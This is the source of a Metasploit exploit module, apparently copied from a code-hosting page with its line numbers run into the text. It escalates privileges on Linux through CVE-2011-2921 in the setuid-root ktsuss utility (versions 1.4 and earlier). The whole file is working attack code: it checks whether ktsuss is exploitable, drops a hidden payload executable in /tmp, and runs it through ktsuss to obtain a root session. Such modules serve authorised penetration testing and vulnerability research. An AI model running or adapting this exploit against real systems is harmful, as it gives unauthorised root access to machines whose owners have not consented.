Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
78762 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::Linux::Priv10include Msf::Post::Linux::System11include Msf::Exploit::EXE12include Msf::Exploit::FileDropper13prepend Msf::Exploit::Remote::AutoCheck1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'ktsuss suid Privilege Escalation',20'Description' => %q{21This module attempts to gain root privileges by exploiting22a vulnerability in ktsuss versions 1.4 and prior.2324The ktsuss executable is setuid root and does not drop25privileges prior to executing user specified commands,26resulting in command execution with root privileges.2728This module has been tested successfully on:2930ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and31ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).32},33'License' => MSF_LICENSE,34'Author' => [35'John Lightsey', # Discovery and exploit36'bcoles' # Metasploit37],38'DisclosureDate' => '2011-08-13',39'References' => [40['CVE', '2011-2921'],41['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],42['URL', 'https://security.gentoo.org/glsa/201201-15'],43['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']44],45'Platform' => ['linux'],46'Arch' => [47ARCH_X86,48ARCH_X64,49ARCH_ARMLE,50ARCH_AARCH64,51ARCH_RISCV64LE,52ARCH_RISCV32LE,53ARCH_PPC,54ARCH_MIPSLE,55ARCH_MIPSBE56],57'SessionTypes' => ['shell', 'meterpreter'],58'Targets' => [['Auto', {}]],59'DefaultOptions' => {60'AppendExit' => true,61'PrependSetresuid' => true,62'PrependSetresgid' => true,63'PrependSetreuid' => true,64'PrependSetuid' => true,65'PrependFork' => true66},67'Notes' => {68'Reliability' => [ REPEATABLE_SESSION ],69'Stability' => [ CRASH_SAFE ],70'SideEffects' => UNKNOWN_SIDE_EFFECTS71},72'DefaultTarget' => 073)74)75register_options [76OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])77]78register_advanced_options [79OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])80]81end8283def ktsuss_path84datastore['KTSUSS_PATH']85end8687def base_dir88datastore['WritableDir'].to_s89end9091def upload(path, data)92print_status "Writing '#{path}' (#{data.size} bytes) ..."93rm_f path94write_file path, data95register_file_for_cleanup path96end9798def upload_and_chmodx(path, data)99upload path, data100chmod path101end102103def check104return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path105return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path106107vprint_good "#{ktsuss_path} is setuid"108109id = cmd_exec 'whoami'110res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s111vprint_status res112113unless res.include? 'uid=0'114return CheckCode::Safe('ktsuss does not appear to be exploitable')115end116117CheckCode::Vulnerable("ktsuss is exploitable")118end119120def exploit121if !datastore['ForceExploit'] && is_root?122fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')123end124125unless writable? base_dir126fail_with Failure::BadConfig, "#{base_dir} is not writable"127end128129payload_name = ".#{rand_text_alphanumeric 10..15}"130payload_path = "#{base_dir}/#{payload_name}"131upload_and_chmodx payload_path, generate_payload_exe132133print_status 'Executing payload ...'134id = cmd_exec 'whoami'135res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "136vprint_line res137end138end139140141